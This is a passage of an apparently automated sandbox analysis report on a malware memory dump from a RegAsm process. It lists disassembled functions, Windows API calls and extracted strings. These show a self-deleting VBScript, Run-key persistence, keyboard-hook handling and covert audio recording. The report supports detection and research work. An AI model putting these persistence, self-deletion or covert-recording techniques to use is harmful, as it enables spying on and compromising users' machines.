                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                                                                                                  • Instruction ID: 2ce137016e68017aebaac4bbf916a57dff7c64f07ba89619fc9d118b501662d8
                                                                                                                                  • Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                                                                                                  • Instruction Fuzzy Hash: F9C1D5B22091930AEF3D4639853063FFAA05E957B171A635FE4F2CB2D4FE18C924D514
                                                                                                                                  Function 004381E8 Relevance: .3, Instructions: 341COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                                                                                                  • Instruction ID: bc2d6065b6eca92eb436045fb502f22698d18e4b36ed1375ff5d5b4a3f5914d0
                                                                                                                                  • Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                                                                                                  • Instruction Fuzzy Hash: 75C1D7722091930AEF2D4739853463FFAA15EA57B171A236FE4F2CB2D4FE28C924D514
                                                                                                                                  Function 0043797E Relevance: .3, Instructions: 331COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                                                                                                                                  • Instruction ID: 708e8454946620f186a1700387687a053fc407bd339bf74556c1f47a113f5a1a
                                                                                                                                  • Opcode Fuzzy Hash: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                                                                                                                                  • Instruction Fuzzy Hash: 95C1C3B220D0930AEF3D4639853063FFAA15EA67B171A675ED4F2CB2D4FE18C924D614
                                                                                                                                  Function 00437566 Relevance: .3, Instructions: 323COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                                                                                                  • Instruction ID: 79ee4f31eba35b7567f7a499d226924a3a6c1d38d98321864059dc3c63d33f3d
                                                                                                                                  • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                                                                                                  • Instruction Fuzzy Hash: 76C1E6B220D0930AEF3D4639853463FBAA15EA57B171A236FD4F2CB2D4FE18C924C614
                                                                                                                                  Function 0041DBF3 Relevance: .3, Instructions: 277COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 2e85d6dc501202f3c2e801dccf0940871ddf0a86c450432c97aa3465398b7722
                                                                                                                                  • Instruction ID: 096ff1c695f9ab27d4b2dbab46670c8098de74970727e2ec16deab2a6828ec1d
                                                                                                                                  • Opcode Fuzzy Hash: 2e85d6dc501202f3c2e801dccf0940871ddf0a86c450432c97aa3465398b7722
                                                                                                                                  • Instruction Fuzzy Hash: EAB1A37951429A8ACB05EF68C4913F63BA1EF6A301F0850B9EC9CCF757D2398506EB24
                                                                                                                                  Function 0043E34B Relevance: .2, Instructions: 237COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 30caec0efc745099040319085d406cd9bdcff08e218f1b0552064e12ef4373be
                                                                                                                                  • Instruction ID: 32d6082e35155a0a096806a6943d6f48c3d67459c64856e3d931f7c23e0710f9
                                                                                                                                  • Opcode Fuzzy Hash: 30caec0efc745099040319085d406cd9bdcff08e218f1b0552064e12ef4373be
                                                                                                                                  • Instruction Fuzzy Hash: 59618971202709A6EE34892B88967BF63949F6D314F10342FE983DB3C1D65DDD82931E
                                                                                                                                  Function 0043E5A8 Relevance: .2, Instructions: 237COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 341ce5e44018b0d8febb5363e57dd776d1ec6df4a054cddc6676df713c6a7dda
                                                                                                                                  • Instruction ID: 5d22fc1bcc5d638cf6a4a0606be4d5c4d5bba199c703cf788a7f99cafe8d65e8
                                                                                                                                  • Opcode Fuzzy Hash: 341ce5e44018b0d8febb5363e57dd776d1ec6df4a054cddc6676df713c6a7dda
                                                                                                                                  • Instruction Fuzzy Hash: 12615871602718A6DA38592B88977BF2384EB2D344F94351BE483DB3C1D75EAD43871E
                                                                                                                                  Function 0043E11C Relevance: .2, Instructions: 214COMMONLIBRARYCODE
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 0cdc0b4430c882dd513f9aba2f942575131dd1f5e6007437ccc46010af73f7df
                                                                                                                                  • Instruction ID: 6c705508b021f12d90b9f9697341ee8142861c1d23b7247138392dbd6e0aa073
                                                                                                                                  • Opcode Fuzzy Hash: 0cdc0b4430c882dd513f9aba2f942575131dd1f5e6007437ccc46010af73f7df
                                                                                                                                  • Instruction Fuzzy Hash: 59517671603604A7EF3445AB85567BF63899B0E304F18395FE882C73C2C52DDE02875E
                                                                                                                                  Function 0043DEED Relevance: .2, Instructions: 214COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: e4e8e107ebb569481f6dec165aac6f3bea1aaf1a879556bc36ff33913e703c4a
                                                                                                                                  • Instruction ID: 84bf5d8b6cf777f915eff3509e2c27b9c7ae744ab127a35c194aadb47efed811
                                                                                                                                  • Opcode Fuzzy Hash: e4e8e107ebb569481f6dec165aac6f3bea1aaf1a879556bc36ff33913e703c4a
                                                                                                                                  • Instruction Fuzzy Hash: E1517761E0660557DF38892A94D67BF23A59B4E308F18351FE483CB3C2C65EEE06835E
                                                                                                                                  Function 00427C40 Relevance: .2, Instructions: 187COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 5391bdb46e7b363b15ab8dfbfe7515acbec1a5683836347dd09947684361f79a
                                                                                                                                  • Instruction ID: d4d389248adab082d17fbdeb677dfbf93ddf16fcbb8c162b69e64d6cf0e33668
                                                                                                                                  • Opcode Fuzzy Hash: 5391bdb46e7b363b15ab8dfbfe7515acbec1a5683836347dd09947684361f79a
                                                                                                                                  • Instruction Fuzzy Hash: 61615B72A083059BC308DF35E481A5FB7E4AFCC718F814E2EF595D6151EA74EA08CB86
                                                                                                                                  Function 004387F0 Relevance: .1, Instructions: 76COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                                                                  • Instruction ID: 582e3a7babb983407823034c482dc4f24404013c153b7f4d28c3fef3b0c68a44
                                                                                                                                  • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                                                                  • Instruction Fuzzy Hash: 43113B7720034183D60CAA6DC4B45BBD795EADE320FBD627FF0414B744CA2AD4459508
                                                                                                                                  Function 0040D45B Relevance: 45.8, APIs: 6, Strings: 20, Instructions: 282registryCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 0041288B: TerminateProcess.KERNEL32(00000000,pth_unenc,0040F903), ref: 0041289B
                                                                                                                                    • Part of subcall function 0041288B: WaitForSingleObject.KERNEL32(000000FF), ref: 004128AE
                                                                                                                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,00000000), ref: 0040D558
                                                                                                                                  • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040D56B
                                                                                                                                  • SetFileAttributesW.KERNEL32(?,00000080,?,?,00000000), ref: 0040D584
                                                                                                                                  • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,00000000), ref: 0040D5B4
                                                                                                                                    • Part of subcall function 0040B8E7: TerminateThread.KERNEL32(0040A2B8,00000000,004752F0,pth_unenc,0040D0F3,004752D8,004752F0,?,pth_unenc), ref: 0040B8F6
                                                                                                                                    • Part of subcall function 0040B8E7: UnhookWindowsHookEx.USER32 ref: 0040B902
                                                                                                                                    • Part of subcall function 0040B8E7: TerminateThread.KERNEL32(0040A2A2,00000000,?,pth_unenc), ref: 0040B910
                                                                                                                                    • Part of subcall function 0041C482: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000), ref: 0041C4C1
                                                                                                                                  • ShellExecuteW.SHELL32(00000000,open,00000000,00466478,00466478,00000000), ref: 0040D7FF
                                                                                                                                  • ExitProcess.KERNEL32 ref: 0040D80B
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: File$Terminate$AttributesProcessThread$CreateDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                                                                                                                  • String ID: """, 0$")$@qF$@qF$CreateObject("WScript.Shell").Run "cmd /c ""$On Error Resume Next$P2$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$\update.vbs$dMG$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$wend$while fso.FileExists("
                                                                                                                                  • API String ID: 1861856835-1346542981
                                                                                                                                  • Opcode ID: b2c98317dfb15ea04512d0939afff2237e6240c9cbfa0792984ef7edd010dbee
                                                                                                                                  • Instruction ID: 9f807323933333198641953f201c1fc8368d74e19fdabe041c5449f7db564f80
                                                                                                                                  • Opcode Fuzzy Hash: b2c98317dfb15ea04512d0939afff2237e6240c9cbfa0792984ef7edd010dbee
                                                                                                                                  • Instruction Fuzzy Hash: 8791B0716082005AC315FB62D8529AF77A8AFD4309F10443FB64AA71E3EF7C9D49C65E
                                                                                                                                  Function 0040D0D1 Relevance: 42.3, APIs: 6, Strings: 18, Instructions: 260registryCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 0041288B: TerminateProcess.KERNEL32(00000000,pth_unenc,0040F903), ref: 0041289B
                                                                                                                                    • Part of subcall function 0041288B: WaitForSingleObject.KERNEL32(000000FF), ref: 004128AE
                                                                                                                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D1E0
                                                                                                                                  • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040D1F3
                                                                                                                                  • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D223
                                                                                                                                  • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D232
                                                                                                                                    • Part of subcall function 0040B8E7: TerminateThread.KERNEL32(0040A2B8,00000000,004752F0,pth_unenc,0040D0F3,004752D8,004752F0,?,pth_unenc), ref: 0040B8F6
                                                                                                                                    • Part of subcall function 0040B8E7: UnhookWindowsHookEx.USER32 ref: 0040B902
                                                                                                                                    • Part of subcall function 0040B8E7: TerminateThread.KERNEL32(0040A2A2,00000000,?,pth_unenc), ref: 0040B910
                                                                                                                                    • Part of subcall function 0041BA09: GetCurrentProcessId.KERNEL32(00000000,63841986,00000000,?,?,?,?,00466478,0040D248,.vbs,?,?,?,?,?,004752F0), ref: 0041BA30
                                                                                                                                  • ShellExecuteW.SHELL32(00000000,open,00000000,00466478,00466478,00000000), ref: 0040D44D
                                                                                                                                  • ExitProcess.KERNEL32 ref: 0040D454
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FileProcessTerminate$AttributesThread$CurrentDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                                                                                                                  • String ID: ")$.vbs$On Error Resume Next$P2$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$dMG$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$pth_unenc$wend$while fso.FileExists("$xpF
                                                                                                                                  • API String ID: 3797177996-3777177265
                                                                                                                                  • Opcode ID: ff441d04d561ddd7c833bcb51d5ea1663e6cd4c68d93212227685ad438b1ef63
                                                                                                                                  • Instruction ID: f7f00373e35faeae073ffedb9d5543756e5675edee5c5b567d0d61755fae189b
                                                                                                                                  • Opcode Fuzzy Hash: ff441d04d561ddd7c833bcb51d5ea1663e6cd4c68d93212227685ad438b1ef63
                                                                                                                                  • Instruction Fuzzy Hash: 6181AF716082405AC315FB62D8529AF77A8AFD0308F10483FB58A671E3EF7C9E49C65E
                                                                                                                                  Function 004124B0 Relevance: 42.2, APIs: 17, Strings: 7, Instructions: 190synchronizationsleepfileCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • CreateMutexA.KERNEL32(00000000,00000001,00000000,00000000,8)3,00000003), ref: 004124CF
                                                                                                                                  • ExitProcess.KERNEL32(00000000), ref: 004124DB
                                                                                                                                  • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00412555
                                                                                                                                  • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 00412564
                                                                                                                                  • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0041256F
                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00412576
                                                                                                                                  • GetCurrentProcessId.KERNEL32 ref: 0041257C
                                                                                                                                  • PathFileExistsW.SHLWAPI(?), ref: 004125AD
                                                                                                                                  • GetTempPathW.KERNEL32(00000104,?), ref: 00412610
                                                                                                                                  • GetTempFileNameW.KERNEL32(?,temp_,00000000,?), ref: 0041262A
                                                                                                                                  • lstrcatW.KERNEL32(?,.exe), ref: 0041263C
                                                                                                                                    • Part of subcall function 0041C482: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000), ref: 0041C4C1
                                                                                                                                  • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 0041267C
                                                                                                                                  • Sleep.KERNEL32(000001F4), ref: 004126BD
                                                                                                                                  • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 004126D2
                                                                                                                                  • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004126DD
                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 004126E4
                                                                                                                                  • GetCurrentProcessId.KERNEL32 ref: 004126EA
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Process$File$Create$CloseCurrentHandleObjectOpenPathSingleTempWait$ExecuteExistsExitMutexNameShellSleeplstrcat
                                                                                                                                  • String ID: .exe$8)3$P2$WDH$exepath$open$temp_
                                                                                                                                  • API String ID: 2649220323-493282040
                                                                                                                                  • Opcode ID: 1b3fed83da2aab5ae681b9012af93f6771012d14136d86493a6b51ff35766dc4
                                                                                                                                  • Instruction ID: ea0e71dbd1735df2f0ffa6a76a18ae54bfb239dee3d1740714ca762960b89f4c
                                                                                                                                  • Opcode Fuzzy Hash: 1b3fed83da2aab5ae681b9012af93f6771012d14136d86493a6b51ff35766dc4
                                                                                                                                  • Instruction Fuzzy Hash: 4C51C871A00215BBDB10ABA09C99EFE336D9B04715F1041ABF501E71D2EF7C8E858A5D
                                                                                                                                  Function 0041B0D8 Relevance: 40.4, APIs: 12, Strings: 11, Instructions: 180synchronizationCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • mciSendStringW.WINMM(00000000,00000000,00000000,00000000), ref: 0041B1CD
                                                                                                                                  • mciSendStringA.WINMM(play audio,00000000,00000000,00000000), ref: 0041B1E1
                                                                                                                                  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,000000A9,004660B4), ref: 0041B209
                                                                                                                                  • PathFileExistsW.SHLWAPI(00000000), ref: 0041B21F
                                                                                                                                  • mciSendStringA.WINMM(pause audio,00000000,00000000,00000000), ref: 0041B260
                                                                                                                                  • mciSendStringA.WINMM(resume audio,00000000,00000000,00000000), ref: 0041B278
                                                                                                                                  • mciSendStringA.WINMM(status audio mode,?,00000014,00000000), ref: 0041B28D
                                                                                                                                  • SetEvent.KERNEL32 ref: 0041B2AA
                                                                                                                                  • WaitForSingleObject.KERNEL32(000001F4), ref: 0041B2BB
                                                                                                                                  • CloseHandle.KERNEL32 ref: 0041B2CB
                                                                                                                                  • mciSendStringA.WINMM(stop audio,00000000,00000000,00000000), ref: 0041B2ED
                                                                                                                                  • mciSendStringA.WINMM(close audio,00000000,00000000,00000000), ref: 0041B2F7
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: SendString$Event$CloseCreateExistsFileHandleObjectPathSingleWait
                                                                                                                                  • String ID: alias audio$" type $close audio$open "$pause audio$play audio$resume audio$status audio mode$stop audio$stopped$NG
                                                                                                                                  • API String ID: 738084811-2094122233
                                                                                                                                  • Opcode ID: d2db031e3b1df8eedd793174f912beb473d8d97f533f0dd4154628810b81d940
                                                                                                                                  • Instruction ID: 904a2ea9ee052b7cd0d2885f28b370526ea16529c5f4723dacad6ab52bd59ce6
                                                                                                                                  • Opcode Fuzzy Hash: d2db031e3b1df8eedd793174f912beb473d8d97f533f0dd4154628810b81d940
                                                                                                                                  • Instruction Fuzzy Hash: 015193B12842056ED314B731DC96ABF779CDB80359F10053FB246621E2EF789D498AAE
                                                                                                                                  Function 00401A6D Relevance: 35.2, APIs: 16, Strings: 4, Instructions: 156fileCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401AD9
                                                                                                                                  • WriteFile.KERNEL32(00000000,RIFF,00000004,?,00000000), ref: 00401B03
                                                                                                                                  • WriteFile.KERNEL32(00000000,00000000,00000004,00000000,00000000), ref: 00401B13
                                                                                                                                  • WriteFile.KERNEL32(00000000,WAVE,00000004,00000000,00000000), ref: 00401B23
                                                                                                                                  • WriteFile.KERNEL32(00000000,fmt ,00000004,00000000,00000000), ref: 00401B33
                                                                                                                                  • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401B43
                                                                                                                                  • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401B54
                                                                                                                                  • WriteFile.KERNEL32(00000000,00472AAA,00000002,00000000,00000000), ref: 00401B65
                                                                                                                                  • WriteFile.KERNEL32(00000000,00472AAC,00000004,00000000,00000000), ref: 00401B75
                                                                                                                                  • WriteFile.KERNEL32(00000000,00000001,00000004,00000000,00000000), ref: 00401B85
                                                                                                                                  • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401B96
                                                                                                                                  • WriteFile.KERNEL32(00000000,00472AB6,00000002,00000000,00000000), ref: 00401BA7
                                                                                                                                  • WriteFile.KERNEL32(00000000,data,00000004,00000000,00000000), ref: 00401BB7
                                                                                                                                  • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401BC7
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: File$Write$Create
                                                                                                                                  • String ID: RIFF$WAVE$data$fmt
                                                                                                                                  • API String ID: 1602526932-4212202414
                                                                                                                                  • Opcode ID: bdde9fe629d6d0b3cb01441b1d036ed99aff71c5e0b2c5a0236a53ffdd76988e
                                                                                                                                  • Instruction ID: e437df56db769974f3bb03b9acf3047b6271bea3308615ff466a61b001f8e6b8
                                                                                                                                  • Opcode Fuzzy Hash: bdde9fe629d6d0b3cb01441b1d036ed99aff71c5e0b2c5a0236a53ffdd76988e
                                                                                                                                  • Instruction Fuzzy Hash: D1413F72644218BAE210DB51DD85FBB7FECEB89B50F40441AFA44D60C0E7A5E909DBB3
                                                                                                                                  Function 004072AB Relevance: 35.1, APIs: 12, Strings: 8, Instructions: 62libraryloaderCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
